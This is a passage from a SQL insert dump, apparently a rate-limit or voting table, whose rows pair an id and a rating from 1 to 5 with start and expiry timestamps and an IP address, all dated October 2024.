22:34:29','185.241.208.174'),(1979,5,'2024-10-02 22:34:30','2024-10-03 22:34:30','185.241.208.174'),(1980,2,'2024-10-03 11:15:48','2024-10-04 11:15:48','165.232.146.82'),(1981,1,'2024-10-03 11:15:48','2024-10-04 11:15:48','165.232.146.82'),(1982,3,'2024-10-03 11:15:48','2024-10-04 11:15:48','165.232.146.82'),(1983,5,'2024-10-03 11:15:48','2024-10-04 11:15:48','165.232.146.82'),(1984,4,'2024-10-03 11:15:48','2024-10-04 11:15:48','165.232.146.82'),(1985,4,'2024-10-03 12:42:40','2024-10-04 12:42:40','185.241.208.39'),(1986,5,'2024-10-03 12:42:40','2024-10-04 12:42:40','185.241.208.39'),(1987,3,'2024-10-03 12:42:40','2024-10-04 12:42:40','185.241.208.39'),(1988,2,'2024-10-03 12:42:40','2024-10-04 12:42:40','185.241.208.39'),(1989,1,'2024-10-03 12:42:40','2024-10-04 12:42:40','185.241.208.39'),(1990,4,'2024-10-03 15:41:44','2024-10-04 15:41:44','45.138.16.206'),(1991,3,'2024-10-03 15:41:44','2024-10-04 15:41:44','45.138.16.206'),(1992,2,'2024-10-03 15:41:44','2024-10-04 15:41:44','45.138.16.206'),(1993,5,'2024-10-03 15:41:44','2024-10-04 15:41:44','45.138.16.206'),(1994,1,'2024-10-03 15:41:46','2024-10-04 15:41:46','45.138.16.206'),(1995,2,'2024-10-05 05:08:37','2024-10-06 05:08:37','165.232.146.82'),(1996,1,'2024-10-05 05:08:37','2024-10-06 05:08:37','165.232.146.82'),(1997,4,'2024-10-05 05:08:37','2024-10-06 05:08:37','165.232.146.82'),(1998,3,'2024-10-05 05:08:38','2024-10-06 05:08:38','165.232.146.82'),(1999,5,'2024-10-05 05:08:38','2024-10-06 05:08:38','165.232.146.82'),(2000,5,'2024-10-05 08:11:08','2024-10-06 08:11:08','185.241.208.39'),(2001,3,'2024-10-05 08:11:08','2024-10-06 08:11:08','185.241.208.39'),(2002,2,'2024-10-05 08:11:08','2024-10-06 08:11:08','185.241.208.39'),(2003,1,'2024-10-05 08:11:08','2024-10-06 08:11:08','185.241.208.39'),(2004,4,'2024-10-05 08:11:09','2024-10-06 08:11:09','185.241.208.39'),(2005,1,'2024-10-05 10:29:10','2024-10-06 10:29:10','45.138.16.206'),(2006,2,'2024-10-05 10:29:10','2024-10-06 10:29:10','45.138.16.206'),(2007,5,'2024-10-05 10:29:10','2024-10-06 10:29:10','45.138.16.206'),(2008,3,'2024-10-05 10:29:10','2024-10-06 10:29:10','45.138.16.206'),(2009,4,'2024-10-05 10:29:10','2024-10-06 10:29:10','45.138.16.206'),(2010,4,'2024-10-06 00:16:17','2024-10-07 00:16:17','185.241.208.174'),(2011,2,'2024-10-06 00:16:17','2024-10-07 00:16:17','185.241.208.174'),(2012,5,'2024-10-06 00:16:17','2024-10-07 00:16:17','185.241.208.174'),(2013,3,'2024-10-06 00:16:17','2024-10-07 00:16:17','185.241.208.174'),(2014,1,'2024-10-06 00:16:19','2024-10-07 00:16:19','185.241.208.174'),(2015,1,'2024-10-06 00:48:42','2024-10-07 00:48:42','185.241.208.188'),(2016,4,'2024-10-06 00:48:42','2024-10-07 00:48:42','185.241.208.188'),(2017,3,'2024-10-06 00:48:42','2024-10-07 00:48:42','185.241.208.188'),(2018,2,'2024-10-06 00:48:42','2024-10-07 00:48:42','185.241.208.188'),(2019,5,'2024-10-06 00:48:44','2024-10-07 00:48:44','185.241.208.188'),(2020,1,'2024-10-06 01:16:53','2024-10-07 01:16:53','185.241.208.100'),(2021,3,'2024-10-06 01:16:54','2024-10-07 01:16:54','185.241.208.100'),(2022,4,'2024-10-06 01:16:54','2024-10-07 01:16:54','185.241.208.100'),(2023,2,'2024-10-06 01:16:54','2024-10-07 01:16:54','185.241.208.100'),(2024,5,'2024-10-06 01:16:55','2024-10-07 01:16:55','185.241.208.100'),(2025,2,'2024-10-06 23:19:32','2024-10-06 23:29:32','130.51.120.4'),(2026,1,'2024-10-06 23:19:32','2024-10-06 23:29:32','130.51.120.4'),(2027,3,'2024-10-06 23:20:32','2024-10-06 23:30:32','130.51.120.4'),(2028,4,'2024-10-06 23:33:44','2024-10-06 23:43:44','130.51.120.4'),(2029,1,'2024-10-06 23:34:48','2024-10-06 23:44:48','130.51.120.4'),(2030,2,'2024-10-06 23:35:51','2024-10-06 23:45:51','130.51.120.4'),(2031,3,'2024-10-06 23:43:54','2024-10-06 23:53:54','130.51.120.4'),(2032,2,'2024-10-06 23:52:32','2024-10-07 23:52:32','130.51.120.4'),(2033,1,'2024-10-06 23:53:39','2024-10-07 23:53:39','130.51.120.4'),(2034,4,'2024-10-06 23:59:06','2024-10-07 23:59:06','130.51.120.4'),(2035,3,'2024-10-07 00:01:29','2024-10-08 00:01:29','130.51.120.4'),(2036,4,'2024-10-07 00:33:52','2024-10-08 00:33:52','45.138.16.206'),(2037,2,'2024-10-07 00:33:52','2024-10-08 00:33:52','45.138.16.206'),(2038,3,'2024-10-07 00:33:52','2024-10-08 00:33:52','45.138.16.206'),(2039,1,'2024-10-07 00:33:52','2024-10-08 00:33:52','45.138.16.206'),(2040,5,'2024-10-07 00:33:54','2024-10-08 00:33:54','45.138.16.206'),(2041,5,'2024-10-07 00:43:37','2024-10-08 00:43:37','165.232.146.82'),(2042,4,'2024-10-07 00:43:37','2024-10-08 00:43:37','165.232.146.82'),(2043,1,'2024-10-07 00:43:38','2024-10-08 00:43:38','165.232.146.82'),(2044,2,'2024-10-07 00:43:38','2024-10-08 00:43:38','165.232.146.82'),(2045,3,'2024-10-07 00:43:38','2024-10-08 00:43:38','165.232.146.82'),(2046,5,'2024-10-07 08:54:16','2024-10-08 08:54:16','130.51.120.4'),(2047,1,'2024-10-07 12:47:48','2024-10-07 12:57:48','185.241.208.188'),(2048,3,'2024-10-07 14:13:21','2024-10-08 14:13:21','185.241.208.39'),(2049,4,'2024-10-07 14:13:21','2024-10-08 14:13:21','185.241.208.39'),(2050,2,'2024-10-07 14:13:21','2024-10-08 14:13:21','185.241.208.39'),(2051,1,'2024-10-07 14:13:21','2024-10-08 14:13:21','185.241.208.39'),(2052,5,'2024-10-07 14:13:21','2024-10-08 14:13:21','185.241.208.39'),(2053,1,'2024-10-07 20:42:08','2024-10-07 20:52:08','185.241.208.188'),(2054,2,'2024-10-08 04:24:27','2024-10-09 04:24:27','45.138.16.206'),(2055,1,'2024-10-08 04:24:27','2024-10-09 04:24:27','45.138.16.206'),(2056,3,'2024-10-08 04:24:27','2024-10-09 04:24:27','45.138.16.206'),(2057,4,'2024-10-08 04:24:28','2024-10-09 04:24:28','45.138.16.206'),(2058,5,'2024-10-08 04:24:28','2024-10-09 04:24:28','45.138.16.206'),(2059,5,'2024-10-08 10:37:48','2024-10-09 10:37:48','165.232.146.82'),(2060,2,'2024-10-08 10:37:48','2024-10-09 10:37:48','165.232.146.82'),(2061,4,'2024-10-08 10:37:48','2024-10-09 10:37:48','165.232.146.82'),(2062,3,'2024-10-08 10:37:49','2024-10-09 10:37:49','165.232.146.82'),(2063,1,'2024-10-08 10:37:49','2024-10-09 10:37:49','165.232.146.82'),(2064,2,'2024-10-08 15:53:06','2024-10-09 15:53:06','172.232.180.18'),(2065,5,'2024-10-08 15:53:06','2024-10-09 15:53:06','172.232.180.18'),(2066,4,'2024-10-08 15:53:06','2024-10-09 15:53:06','172.232.180.18'),(2067,3,'2024-10-08 15:53:06','2024-10-09 15:53:06','172.232.180.18'),(2068,1,'2024-10-08 15:53:07','2024-10-09 15:53:07','172.232.180.18'),(2069,1,'2024-10-08 22:44:13','2024-10-09 22:44:13','185.241.208.188'),(2070,3,'2024-10-08 22:44:13','2024-10-09 22:44:13','185.241.208.188'),(2071,2,'2024-10-08 22:44:13','2024-10-09 22:44:13','185.241.208.188'),(2072,5,'2024-10-08 22:44:13','2024-10-09 22:44:13','185.241.208.188'),(2073,4,'2024-10-08 22:44:13','2024-10-09 22:44:13','185.241.208.188'),(2074,5,'2024-10-09 04:55:03','2024-10-10 04:55:03','185.241.208.39'),(2075,4,'2024-10-09 04:55:03','2024-10-10 04:55:03','185.241.208.39'),(2076,3,'2024-10-09 04:55:03','2024-10-10 04:55:03','185.241.208.39'),(2077,1,'2024-10-09 04:55:03','2024-10-10 04:55:03','185.241.208.39'),(2078,2,'2024-10-09 04:55:05','2024-10-10 04:55:05','185.241.208.39'),(2079,1,'2024-10-09 22:10:37','2024-10-10 22:10:37','165.232.146.82'),(2080,4,'2024-10-09 22:10:37','2024-10-10 22:10:37','165.232.146.82'),(2081,5,'2024-10-09 22:10:37','2024-10-10 22:10:37','165.232.146.82'),(2082,3,'2024-10-09 22:10:37','2024-10-10 22:10:37','165.232.146.82'),(2083,2,'2024-10-09 22:10:37','2024-10-10 22:10:37','165.232.146.82'),(2084,3,'2024-10-10 23:58:33','2024-10-11 23:58:33','185.241.208.250'),(2085,2,'2024-10-10 23:58:33','2024-10-11 23:58:33','185.241.208.250'),(2086,1,'2024-10-10 23:58:33','2024-10-11 23:58:33','185.241.208.250'),(2087,5,'2024-10-10 23:58:33','2024-10-11 23:58:33','185.241.208.250'),(2088,4,'2024-10-10 23:58:33','2024-10-11 23:58:33','185.241.208.250'),(2089,3,'2024-10-11 12:31:06','2024-10-12 12:31:06','45.141.215.35'),(2090,2,'2024-10-11 12:31:06','2024-10-12 12:31:06','45.141.215.35'),(2091,5,'2024-10-11 12:31:06','2024-10-12 12:31:06','45.141.215.35'),(2092,1,'2024-10-11 12:31:06','2024-10-12 12:31:06','45.141.215.35'),(2093,4,'2024-10-11 12:31:06','2024-10-12 12:31:06','45.141.215.35'),(2094,1,'2024-10-11 17:45:29','2024-10-12 17:45:29','185.241.208.100'),(2095,3,'2024-10-11 17:45:29','2024-10-12 17:45:29','185.241.208.100'),(2096,5,'2024-10-11 17:45:30','2024-10-12 17:45:30','185.241.208.100'),(2097,2,'2024-10-11 17:45:30','2024-10-12 17:45:30','185.241.208.100'),(2098,4,'2024-10-11 17:45:32','2024-10-12 17:45:32','185.241.208.100'),(2099,2,'2024-10-11 20:41:16','2024-10-12 20:41:16','35.221.19.5'),(2100,5,'2024-10-11 20:41:16','2024-10-12 20:41:16','35.221.19.5'),(2101,3,'2024-10-11 20:41:16','2024-10-12 20:41:16','35.221.19.5'),(2102,1,'2024-10-11 20:41:16','2024-10-12 20:41:16','35.221.19.5'),(2103,4,'2024-10-11 20:41:16','2024-10-12 20:41:16','35.221.19.5'),(2104,2,'2024-10-12 02:46:33','2024-10-13 02:46:33','172.232.180.18'),(2105,5,'2024-10-12 02:46:33','2024-10-13 02:46:33','172.232.180.18'),(2106,3,'2024-10-12 02:46:33','2024-10-13 02:46:33','172.232.180.18'),(2107,4,'2024-10-12 02:46:33','2024-10-13 02:46:33','172.232.180.18'),(2108,1,'2024-10-12 02:46:34','2024-10-13 02:46:34','172.232.180.18'),(2109,1,'2024-10-12 03:11:33','2024-10-13 03:11:33','165.232.146.82'),(2110,5,'2024-10-12 03:11:33','2024-10-13 03:11:33','165.232.146.82'),(2111,4,'2024-10-12 03:11:33','2024-10-13 03:11:33','165.232.146.82'),(2112,2,'2024-10-12 03:11:33','2024-10-13 03:11:33','165.232.146.82'),(2113,3,'2024-10-12 03:11:33','2024-10-13 03:11:33','165.232.146.82'),(2114,4,'2024-10-12 20:23:42','2024-10-13 20:23:42','185.241.208.250'),(2115,5,'2024-10-12 20:23:42','2024-10-13 20:23:42','185.241.208.250'),(2116,3,'2024-10-12 20:23:42','2024-10-13 20:23:42','185.241.208.250'),(2117,1,'2024-10-12 20:23:42','2024-10-13 20:23:42','185.241.208.250'),(2118,2,'2024-10-12 20:23:42','2024-10-13 20:23:42','185.241.208.250'),(2119,4,'2024-10-13 01:18:22','2024-10-14 01:18:22','35.221.19.5'),(2120,1,'2024-10-13 01:18:22','2024-10-14 01:18:22','35.221.19.5'),(2121,5,'2024-10-13 01:18:22','2024-10-14 01:18:22','35.221.19.5'),(2122,3,'2024-10-13 01:18:22','2024-10-14 01:18:22','35.221.19.5'),(2123,2,'2024-10-13 01:18:22','2024-10-14 01:18:22','35.221.19.5'),(2124,4,'2024-10-13 10:08:42','2024-10-14 10:08:42','45.141.215.35'),(2125,2,'2024-10-13 10:08:42','2024-10-14 10:08:42','45.141.215.35'),(2126,5,'2024-10-13 10:08:42','2024-10-14 10:08:42','45.141.215.35'),(2127,3,'2024-10-13 10:08:42','2024-10-14 10:08:42','45.141.215.35'),(2128,1,'2024-10-13 10:08:42','2024-10-14 10:08:42','45.141.215.35'),(2129,4,'2024-10-13 21:34:03','2024-10-14 21:34:03','185.241.208.188'),(2130,1,'2024-10-13 21:34:03','2024-10-14 21:34:03','185.241.208.188'),(2131,3,'2024-10-13 21:34:03','2024-10-14 21:34:03','185.241.208.188'),(2132,2,'2024-10-13 21:34:03','2024-10-14 21:34:03','185.241.208.188'),(2133,5,'2024-10-13 21:34:03','2024-10-14 21:34:03','185.241.208.188'),(2134,3,'2024-10-14 03:58:23','2024-10-15 03:58:23','165.232.146.82'),(2135,4,'2024-10-14 03:58:24','2024-10-15 03:58:24','165.232.146.82'),(2136,1,'2024-10-14 03:58:24','2024-10-15 03:58:24','165.232.146.82'),(2137,2,'2024-10-14 03:58:24','2024-10-15 03:58:24','165.232.146.82'),(2138,5,'2024-10-14 03:58:24','2024-10-15 03:58:24','165.232.146.82'),(2139,1,'2024-10-14 14:09:14','2024-10-15 14:09:14','185.241.208.250'),(2140,2,'2024-10-14 14:09:14','2024-10-15 14:09:14','185.241.208.250'),(2141,3,'2024-10-14 14:09:14','2024-10-15 14:09:14','185.241.208.250'),(2142,4,'2024-10-14 14:09:15','2024-10-15 14:09:15','185.241.208.250'),(2143,5,'2024-10-14 14:13:13','2024-10-15 14:13:13','185.241.208.250'),(2144,4,'2024-10-15 04:01:54','2024-10-16 04:01:54','103.132.181.181'),(2145,3,'2024-10-15 04:01:54','2024-10-16 04:01:54','103.132.181.181'),(2146,1,'2024-10-15 04:01:55','2024-10-16 04:01:55','103.132.181.181'),(2147,5,'2024-10-15 04:01:55','2024-10-16 04:01:55','103.132.181.181'),(2148,2,'2024-10-15 04:01:55','2024-10-16 04:01:55','103.132.181.181'),(2149,4,'2024-10-15 20:44:50','2024-10-16 20:44:50','45.141.215.35'),(2150,1,'2024-10-15 20:44:50','2024-10-16 20:44:50','45.141.215.35'),(2151,2,'2024-10-15 20:44:50','2024-10-16 20:44:50','45.141.215.35'),(2152,3,'2024-10-15 20:44:50','2024-10-16 20:44:50','45.141.215.35'),(2153,5,'2024-10-15 20:44:51','2024-10-16 20:44:51','45.141.215.35'),(2154,4,'2024-10-16 05:36:54','2024-10-17 05:36:54','185.241.208.250'),(2155,2,'2024-10-16 05:36:54','2024-10-17 05:36:54','185.241.208.250'),(2156,1,'2024-10-16 05:36:55','2024-10-17 05:36:55','185.241.208.250'),(2157,5,'2024-10-16 05:36:55','2024-10-17 05:36:55','185.241.208.250'),(2158,3,'2024-10-16 05:36:56','2024-10-17 05:36:56','185.241.208.250'),(2159,3,'2024-10-17 10:34:57','2024-10-17 10:44:57','130.51.120.17'),(2160,2,'2024-10-17 10:34:57','2024-10-17 10:44:57','130.51.120.17'),(2161,1,'2024-10-17 10:34:57','2024-10-17 10:44:57','130.51.120.17'),(2162,4,'2024-10-17 10:38:18','2024-10-17 10:48:18','130.51.120.17'),(2163,3,'2024-10-17 10:52:03','2024-10-17 11:02:03','130.51.120.17'),(2164,2,'2024-10-17 10:52:03','2024-10-17 11:02:03','130.51.120.17'),(2165,1,'2024-10-17 10:52:03','2024-10-17 11:02:03','130.51.120.17'),(2166,4,'2024-10-17 10:57:16','2024-10-17 11:07:16','130.51.120.17'),(2167,2,'2024-10-17 11:09:33','2024-10-18 11:09:33','130.51.120.17'),(2168,3,'2024-10-17 11:09:33','2024-10-18 11:09:33','130.51.120.17'),(2169,1,'2024-10-17 11:11:18','2024-10-18 11:11:18','130.51.120.17'),(2170,4,'2024-10-17 11:14:57','2024-10-18 11:14:57','130.51.120.17'),(2171,2,'2024-10-17 18:22:35','2024-10-18 18:22:35','185.241.208.250'),(2172,3,'2024-10-17 18:22:35','2024-10-18 18:22:35','185.241.208.250'),(2173,4,'2024-10-17 18:22:35','2024-10-18 18:22:35','185.241.208.250'),(2174,5,'2024-10-17 18:22:35','2024-10-18 18:22:35','185.241.208.250'),(2175,1,'2024-10-17 18:22:35','2024-10-18 18:22:35','185.241.208.250'),(2176,5,'2024-10-18 21:36:47','2024-10-19 21:36:47','185.241.208.250'),(2177,3,'2024-10-18 21:36:47','2024-10-19 21:36:47','185.241.208.250'),(2178,4,'2024-10-18 21:36:48','2024-10-19 21:36:48','185.241.208.250'),(2179,1,'2024-10-18 21:36:49','2024-10-19 21:36:49','185.241.208.250'),(2180,2,'2024-10-18 21:36:49','2024-10-19 21:36:49','185.241.208.250'),(2181,1,'2024-10-19 12:54:33','2024-10-20 12:54:33','45.141.215.35'),(2182,4,'2024-10-19 12:54:33','2024-10-20 12:54:33','45.141.215.35'),(2183,2,'2024-10-19 12:54:33','2024-10-20 12:54:33','45.141.215.35'),(2184,3,'2024-10-19 12:54:34','2024-10-20 12:54:34','45.141.215.35'),(2185,5,'2024-10-19 12:54:34','2024-10-20 12:54:34','45.141.215.35'),(2186,5,'2024-10-19 23:35:28','2024-10-20 23:35:28','185.241.208.250'),(2187,4,'2024-10-19 23:35:28','2024-10-20 23:35:28','185.241.208.250'),(2188,1,'2024-10-19 23:35:28','2024-10-20 23:35:28','185.241.208.250'),(2189,2,'2024-10-19 23:35:28','2024-10-20 23:35:28','185.241.208.250'),(2190,3,'2024-10-19 23:35:28','2024-10-20 23:35:28','185.241.208.250'),(2191,3,'2024-10-20 22:46:58','2024-10-21 22:46:58','185.241.208.100'),(2192,1,'2024-10-20 22:46:58','2024-10-21 22:46:58','185.241.208.100'),(2193,2,'2024-10-20 22:46:58','2024-10-21 22:46:58','185.241.208.100'),(2194,5,'2024-10-20 22:46:58','2024-10-21 22:46:58','185.241.208.100'),(2195,4,'2024-10-20 22:46:58','2024-10-21 22:46:58','185.241.208.100'),(2196,1,'2024-10-21 00:49:17','2024-10-22 00:49:17','185.241.208.53'),(2197,3,'2024-10-21 00:49:17','2024-10-22 00:49:17','185.241.208.53'),(2198,2,'2024-10-21 00:49:17','2024-10-22 00:49:17','185.241.208.53'),(2199,5,'2024-10-21 00:49:17','2024-10-22 00:49:17','185.241.208.53'),(2200,4,'2024-10-21 00:49:18','2024-10-22 00:49:18','185.241.208.53'),(2201,4,'2024-10-21 03:28:13','2024-10-22 03:28:13','130.51.120.17'),(2202,5,'2024-10-21 03:28:13','2024-10-22 03:28:13','130.51.120.17'),(2203,2,'2024-10-21 03:28:13','2024-10-22 03:28:13','130.51.120.17'),(2204,1,'2024-10-21 03:28:13','2024-10-22 03:28:13','130.51.120.17'),(2205,3,'2024-10-21 03:28:13','2024-10-22 03:28:13','130.51.120.17'),(2206,4,'2024-10-21 07:05:13','2024-10-22 07:05:13','185.241.208.250'),(2207,2,'2024-10-21 07:05:13','2024-10-22 07:05:13','185.241.208.250'),(2208,1,'2024-10-21 07:05:13','2024-10-22 07:05:13','185.241.208.250'),(2209,5,'2024-10-21 07:05:14','2024-10-22 07:05:14','185.241.208.250'),(2210,3,'2024-10-21 07:05:14','2024-10-22 07:05:14','185.241.208.250'),(2211,3,'2024-10-22 00:12:05','2024-10-23 00:12:05','185.241.208.100'),(2212,2,'2024-10-22 00:12:05','2024-10-23 00:12:05','185.241.208.100'),(2213,5,'2024-10-22 00:12:05','2024-10-23 00:12:05','185.241.208.100'),(2214,1,'2024-10-22 00:12:05','2024-10-23 00:12:05','185.241.208.100'),(2215,4,'2024-10-22 00:12:06','2024-10-23 00:12:06','185.241.208.100'),(2216,1,'2024-10-22 00:19:50','2024-10-23 00:19:50','146.70.184.34'),(2217,3,'2024-10-22 00:19:50','2024-10-23 00:19:50','146.70.184.34'),(2218,4,'2024-10-22 00:19:50','2024-10-23 00:19:50','146.70.184.34'),(2219,5,'2024-10-22 00:19:51','2024-10-23 00:19:51','146.70.184.34'),(2220,2,'2024-10-22 00:19:51','2024-10-23 00:19:51','146.70.184.34'),(2221,1,'2024-10-22 03:40:03','2024-10-23 03:40:03','185.241.208.188'),(2222,2,'2024-10-22 03:40:03','2024-10-23 03:40:03','185.241.208.188'),(2223,3,'2024-10-22 03:40:03','2024-10-23 03:40:03','185.241.208.188'),(2224,4,'2024-10-22 03:40:05','2024-10-23 03:40:05','185.241.208.188'),(2225,5,'2024-10-22 03:40:05','2024-10-23 03:40:05','185.241.208.188'),(2226,1,'2024-10-22 12:26:42','2024-10-22 12:36:42','185.241.208.250'),(2227,2,'2024-10-22 12:26:42','2024-10-22 12:36:42','185.241.208.250'),(2228,3,'2024-10-22 12:26:42','2024-10-22 12:36:42','185.241.208.250'),(2229,4,'2024-10-22 12:26:42','2024-10-22 12:36:42','185.241.208.250'),(2230,5,'2024-10-22 12:26:42','2024-10-22 12:36:42','185.241.208.250'),(2231,3,'2024-10-22 12:46:38','2024-10-22 12:56:38','185.241.208.250'),(2232,1,'2024-10-22 12:46:38','2024-10-22 12:56:38','185.241.208.250'),(2233,4,'2024-10-22 12:46:38','2024-10-22 12:56:38','185.241.208.250'),(2234,5,'2024-10-22 12:46:38','2024-10-22 12:56:38','185.241.208.250'),(2235,2,'2024-10-22 12:46:38','2024-10-22 12:56:38','185.241.208.250'),(2236,2,'2024-10-22 13:07:22','2024-10-23 13:07:22','185.241.208.250'),(2237,1,'2024-10-22 13:07:22','2024-10-23 13:07:22','185.241.208.250'),(2238,3,'2024-10-22 13:07:23','2024-10-23 13:07:23','185.241.208.250'),(2239,4,'2024-10-22 13:07:23','2024-10-23 13:07:23','185.241.208.250'),(2240,5,'2024-10-22 13:07:23','2024-10-23 13:07:23','185.241.208.250'),(2241,1,'2024-10-23 16:20:31','2024-10-24 16:20:31','185.241.208.250'),(2242,3,'2024-10-23 16:20:31','2024-10-24 16:20:31','185.241.208.250'),(2243,4,'2024-10-23 16:20:31','2024-10-24 16:20:31','185.241.208.250'),(2244,2,'2024-10-23 16:20:31','2024-10-24 16:20:31','185.241.208.250'),(2245,5,'2024-10-23 16:20:32','2024-10-24 16:20:32','185.241.208.250'),(2246,1,'2024-10-24 00:58:33','2024-10-25 00:58:33','146.70.184.34'),(2247,2,'2024-10-24 00:58:33','2024-10-25 00:58:33','146.70.184.34'),(2248,3,'2024-10-24 00:58:33','2024-10-25 00:58:33','146.70.184.34'),(2249,4,'2024-10-24 00:58:33','2024-10-25 00:58:33','146.70.184.34'),(2250,5,'2024-10-24 00:58:34','2024-10-25 00:58:34','146.70.184.34'),(2251,3,'2024-10-24 13:01:45','2024-10-25 13:01:45','185.241.208.100'),(2252,5,'2024-10-24 13:01:45','2024-10-25 13:01:45','185.241.208.100'),(2253,4,'2024-10-24 13:01:45','2024-10-25 13:01:45','185.241.208.100'),(2254,2,'2024-10-24 13:01:45','2024-10-25 13:01:45','185.241.208.100'),(2255,1,'2024-10-24 13:01:47','2024-10-25 13:01:47','185.241.208.100'),(2256,3,'2024-10-24 17:59:42','2024-10-25 17:59:42','146.70.184.38'),(2257,4,'2024-10-24 17:59:42','2024-10-25 17:59:42','146.70.184.38'),(2258,1,'2024-10-24 17:59:42','2024-10-25 17:59:42','146.70.184.38'),(2259,2,'2024-10-24 17:59:42','2024-10-25 17:59:42','146.70.184.38'),(2260,5,'2024-10-24 17:59:44','2024-10-25 17:59:44','146.70.184.38'),(2261,5,'2024-10-24 19:08:45','2024-10-25 19:08:45','34.82.193.36'),(2262,3,'2024-10-24 19:08:45','2024-10-25 19:08:45','34.82.193.36'),(2263,1,'2024-10-24 19:08:45','2024-10-25 19:08:45','34.82.193.36'),(2264,4,'2024-10-24 19:08:45','2024-10-25 19:08:45','34.82.193.36'),(2265,2,'2024-10-24 19:08:45','2024-10-25 19:08:45','34.82.193.36'),(2266,5,'2024-10-24 19:48:25','2024-10-25 19:48:25','185.241.208.250'),(2267,4,'2024-10-24 19:48:25','2024-10-25 19:48:25','185.241.208.250'),(2268,2,'2024-10-24 19:48:25','2024-10-25 19:48:25','185.241.208.250'),(2269,3,'2024-10-24 19:48:26','2024-10-25 19:48:26','185.241.208.250'),(2270,1,'2024-10-24 19:48:26','2024-10-25 19:48:26','185.241.208.250'),(2271,4,'2024-10-25 18:42:35','2024-10-26 18:42:35','138.199.15.156'),(2272,2,'2024-10-25 18:42:35','2024-10-26 18:42:35','138.199.15.156'),(2273,1,'2024-10-25 18:42:35','2024-10-26 18:42:35','138.199.15.156'),(2274,5,'2024-10-25 18:42:35','2024-10-26 18:42:35','138.199.15.156'),(2275,3,'2024-10-25 18:42:35','2024-10-26 18:42:35','138.199.15.156'),(2276,1,'2024-10-25 19:16:54','2024-10-26 19:16:54','185.241.208.188'),(2277,4,'2024-10-25 19:16:54','2024-10-26 19:16:54','185.241.208.188'),(2278,5,'2024-10-25 19:30:48','2024-10-26 19:30:48','185.241.208.188'),(2279,2,'2024-10-25 19:30:49','2024-10-26 19:30:49','185.241.208.188'),(2280,3,'2024-10-25 20:09:12','2024-10-26 20:09:12','185.241.208.188'),(2281,1,'2024-10-26 01:57:13','2024-10-27 01:57:13','185.241.208.250'),(2282,2,'2024-10-26 01:57:13','2024-10-27 01:57:13','185.241.208.250'),(2283,4,'2024-10-26 01:57:13','2024-10-27 01:57:13','185.241.208.250'),(2284,3,'2024-10-26 01:57:13','2024-10-27 01:57:13','185.241.208.250'),(2285,5,'2024-10-26 01:57:13','2024-10-27 01:57:13','185.241.208.250'),(2286,2,'2024-10-26 09:35:39','2024-10-27 09:35:39','146.70.184.38'),(2287,3,'2024-10-26 09:35:39','2024-10-27 09:35:39','146.70.184.38'),(2288,5,'2024-10-26 09:35:39','2024-10-27 09:35:39','146.70.184.38'),(2289,1,'2024-10-26 09:35:39','2024-10-27 09:35:39','146.70.184.38'),(2290,4,'2024-10-26 09:35:41','2024-10-27 09:35:41','146.70.184.38'),(2291,4,'2024-10-26 14:07:13','2024-10-27 14:07:13','193.32.126.238'),(2292,2,'2024-10-26 14:07:13','2024-10-27 14:07:13','193.32.126.238'),(2293,5,'2024-10-26 14:07:13','2024-10-27 14:07:13','193.32.126.238'),(2294,3,'2024-10-26 14:07:13','2024-10-27 14:07:13','193.32.126.238'),(2295,1,'2024-10-26 14:07:13','2024-10-27 14:07:13','193.32.126.238'),(2296,1,'2024-10-27 04:35:29','2024-10-28 04:35:29','138.199.15.156'),(2297,4,'2024-10-27 04:35:29','2024-10-28 04:35:29','138.199.15.156'),(2298,5,'2024-10-27 04:35:29','2024-10-28 04:35:29','138.199.15.156'),(2299,3,'2024-10-27 04:35:29','2024-10-28 04:35:29','138.199.15.156'),(2300,2,'2024-10-27 04:35:29','2024-10-28 04:35:29','138.199.15.156'),(2301,1,'2024-10-27 12:06:16','2024-10-28 12:06:16','185.241.208.53'),(2302,2,'2024-10-27 12:06:16','2024-10-28 12:06:16','185.241.208.53'),(2303,5,'2024-10-27 12:06:16','2024-10-28 12:06:16','185.241.208.53'),(2304,3,'2024-10-27 12:06:17','2024-10-28 12:06:17','185.241.208.53'),(2305,4,'2024-10-27 12:06:17','2024-10-28 12:06:17','185.241.208.53'),(2306,1,'2024-10-27 23:56:17','2024-10-28 23:56:17','146.70.184.38'),(2307,3,'2024-10-27 23:56:18','2024-10-28 23:56:18','146.70.184.38'),(2308,4,'2024-10-27 23:56:18','2024-10-28 23:56:18','146.70.184.38'),(2309,5,'2024-10-27 23:56:18','2024-10-28 23:56:18','146.70.184.38'),(2310,2,'2024-10-27 23:56:20','2024-10-28 23:56:20','146.70.184.38'),(2311,2,'2024-10-28 09:16:24','2024-10-29 09:16:24','193.32.126.238'),(2312,4,'2024-10-28 09:16:24','2024-10-29 09:16:24','193.32.126.238'),(2313,3,'2024-10-28 09:16:24','2024-10-29 09:16:24','193.32.126.238'),(2314,1,'2024-10-28 09:16:25','2024-10-29 09:16:25','193.32.126.238'),(2315,5,'2024-10-28 09:16:25','2024-10-29 09:16:25','193.32.126.238'),(2316,4,'2024-10-28 17:43:40','2024-10-29 17:43:40','185.241.208.53'),(2317,5,'2024-10-28 17:43:40','2024-10-29 17:43:40','185.241.208.53'),(2318,3,'2024-10-28 17:43:40','2024-10-29 17:43:40','185.241.208.53'),(2319,1,'2024-10-28 17:43:40','2024-10-29 17:43:40','185.241.208.53'),(2320,2,'2024-10-28 17:43:41','2024-10-29 17:43:41','185.241.208.53'),(2321,3,'2024-10-29 21:11:43','2024-10-30 21:11:43','172.232.174.152'),(2322,4,'2024-10-29 21:11:43','2024-10-30 21:11:43','172.232.174.152'),(2323,1,'2024-10-29 21:11:43','2024-10-30 21:11:43','172.232.174.152'),(2324,5,'2024-10-29 21:39:27','2024-10-30 21:39:27','172.232.174.152'),(2325,2,'2024-10-29 21:39:27','2024-10-30 21:39:27','172.232.174.152'),(2326,1,'2024-10-29 21:48:24','2024-10-30 21:48:24','138.199.15.156'),(2327,2,'2024-10-29 21:48:24','2024-10-30 21:48:24','138.199.15.156'),(2328,5,'2024-10-29 21:48:24','2024-10-30 21:48:24','138.199.15.156'),(2329,3,'2024-10-29 21:48:24','2024-10-30 21:48:24','138.199.15.156'),(2330,4,'2024-10-29 21:48:25','2024-10-30 21:48:25','138.199.15.156'),(2331,2,'2024-10-29 22:13:41','2024-10-30 22:13:41','185.241.208.53'),(2332,4,'2024-10-29 22:13:41','2024-10-30 22:13:41','185.241.208.53'),(2333,1,'2024-10-29 22:13:41','2024-10-30 22:13:41','185.241.208.53'),(2334,5,'2024-10-29 22:13:42','2024-10-30 22:13:42','185.241.208.53'),(2335,3,'2024-10-29 22:13:43','2024-10-30 